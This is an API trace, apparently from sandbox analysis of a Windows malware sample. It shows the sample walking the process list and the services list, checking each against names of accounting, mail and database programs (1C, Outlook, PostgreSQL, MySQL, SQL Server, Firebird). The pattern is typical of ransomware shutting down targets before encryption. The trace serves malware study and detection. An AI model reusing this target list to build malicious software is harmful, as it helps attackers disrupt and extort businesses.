	[0154.744] lstrlenW (lpString="smss.exe") returned 8
	[0154.744] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0154.744] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0154.744] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0154.744] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0154.744] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0154.744] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0154.744] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0154.744] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0154.745] lstrlenW (lpString="csrss.exe") returned 9
	[0154.745] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0154.745] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0154.745] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0154.745] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0154.745] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0154.745] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0154.745] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0154.745] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0154.745] lstrlenW (lpString="wininit.exe") returned 11
	[0154.745] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0154.745] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0154.745] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0154.745] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0154.745] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0154.745] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0154.745] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0154.745] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0154.746] lstrlenW (lpString="csrss.exe") returned 9
	[0154.746] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0154.746] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0154.746] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0154.746] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0154.746] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0154.746] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0154.746] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0154.746] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0154.746] lstrlenW (lpString="winlogon.exe") returned 12
	[0154.746] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0154.746] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0154.746] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0154.746] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0154.746] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0154.746] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0154.746] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0154.746] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0154.747] lstrlenW (lpString="services.exe") returned 12
	[0154.747] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0154.747] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0154.747] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0154.747] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0154.747] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0154.747] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0154.747] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0154.747] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0154.747] lstrlenW (lpString="lsass.exe") returned 9
	[0154.747] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0154.747] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0154.747] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0154.747] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0154.747] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0154.747] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0154.747] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0154.747] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0154.748] lstrlenW (lpString="lsm.exe") returned 7
	[0154.748] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0154.748] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0154.748] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0154.748] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0154.748] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0154.748] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0154.748] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0154.748] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0154.748] lstrlenW (lpString="svchost.exe") returned 11
	[0154.748] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0154.748] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0154.748] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0154.748] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0154.748] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0154.748] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0154.749] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0154.749] lstrlenW (lpString="svchost.exe") returned 11
	[0154.749] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0154.749] lstrlenW (lpString="svchost.exe") returned 11
	[0154.749] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0154.749] lstrlenW (lpString="svchost.exe") returned 11
	[0154.750] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0154.750] lstrlenW (lpString="svchost.exe") returned 11
	[0154.750] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0154.750] lstrlenW (lpString="audiodg.exe") returned 11
	[0154.750] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0154.750] lstrlenW (lpString="svchost.exe") returned 11
	[0154.751] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0154.751] lstrlenW (lpString="svchost.exe") returned 11
	[0154.751] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0154.751] lstrlenW (lpString="spoolsv.exe") returned 11
	[0154.751] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0154.751] lstrlenW (lpString="svchost.exe") returned 11
	[0154.752] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0154.752] lstrlenW (lpString="taskhost.exe") returned 12
	[0154.752] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0154.752] lstrlenW (lpString="userinit.exe") returned 12
	[0154.752] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0154.752] lstrlenW (lpString="dwm.exe") returned 7
	[0154.752] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0154.753] lstrlenW (lpString="explorer.exe") returned 12
	[0154.753] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0154.753] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0154.753] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0154.753] lstrlenW (lpString="reader_sl.exe") returned 13
	[0154.753] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0154.754] CloseHandle (hObject=0x384) returned 1
	[0154.754] Sleep (dwMilliseconds=0x1f4) 
	[0155.481] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617110
	[0155.579] EnumServicesStatusExW (in: hSCManager=0xb617110, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0155.579] GetLastError () returned 0xea
	[0155.579] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe90) returned 0xb612378
	[0155.579] EnumServicesStatusExW (in: hSCManager=0xb617110, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xe90, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0155.580] CloseServiceHandle (hSCObject=0xb617110) returned 1
	[0155.580] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0155.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0155.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0155.580] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0155.580] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0155.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0155.580] lstrlenW (lpString="AudioSrv") returned 8
	[0155.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0155.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0155.580] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0155.580] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0155.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0155.580] lstrlenW (lpString="BFE") returned 3
	[0155.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0155.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0155.580] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0155.580] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0155.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0155.580] lstrlenW (lpString="CryptSvc") returned 8
	[0155.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0155.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0155.580] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0155.580] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0155.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0155.581] lstrlenW (lpString="CscService") returned 10
	[0155.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0155.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0155.581] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0155.581] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0155.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0155.581] lstrlenW (lpString="DcomLaunch") returned 10
	[0155.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0155.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0155.581] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0155.581] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0155.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0155.581] lstrlenW (lpString="Dhcp") returned 4
	[0155.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0155.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0155.581] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0155.581] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0155.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0155.581] lstrlenW (lpString="Dnscache") returned 8
	[0155.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0155.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0155.581] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0155.581] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0155.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0155.581] lstrlenW (lpString="DPS") returned 3
	[0155.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0155.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0155.581] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0155.581] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0155.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0155.582] lstrlenW (lpString="eventlog") returned 8
	[0155.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0155.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0155.582] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0155.582] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0155.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0155.582] lstrlenW (lpString="EventSystem") returned 11
	[0155.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0155.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0155.582] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0155.582] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0155.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0155.582] lstrlenW (lpString="gpsvc") returned 5
	[0155.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0155.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0155.582] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0155.582] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0155.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0155.582] lstrlenW (lpString="iphlpsvc") returned 8
	[0155.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0155.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0155.582] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0155.582] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0155.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0155.582] lstrlenW (lpString="LanmanServer") returned 12
	[0155.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0155.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0155.582] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0155.582] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0155.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0155.583] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0155.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0155.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0155.583] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0155.583] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0155.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0155.583] lstrlenW (lpString="lmhosts") returned 7
	[0155.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0155.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0155.583] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0155.583] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0155.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0155.583] lstrlenW (lpString="MMCSS") returned 5
	[0155.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0155.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0155.583] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0155.583] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0155.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0155.583] lstrlenW (lpString="MpsSvc") returned 6
	[0155.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0155.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0155.583] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0155.583] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0155.583] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0155.583] lstrlenW (lpString="NlaSvc") returned 6
	[0155.583] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0155.583] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0155.583] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0155.583] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0155.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0155.584] lstrlenW (lpString="nsi") returned 3
	[0155.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0155.584] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0155.584] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0155.584] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0155.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0155.584] lstrlenW (lpString="PcaSvc") returned 6
	[0155.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0155.584] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0155.584] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0155.584] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0155.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0155.584] lstrlenW (lpString="PlugPlay") returned 8
	[0155.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0155.584] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0155.584] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0155.584] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0155.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0155.584] lstrlenW (lpString="Power") returned 5
	[0155.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0155.584] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0155.584] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0155.584] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0155.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0155.584] lstrlenW (lpString="ProfSvc") returned 7
	[0155.584] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0155.584] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
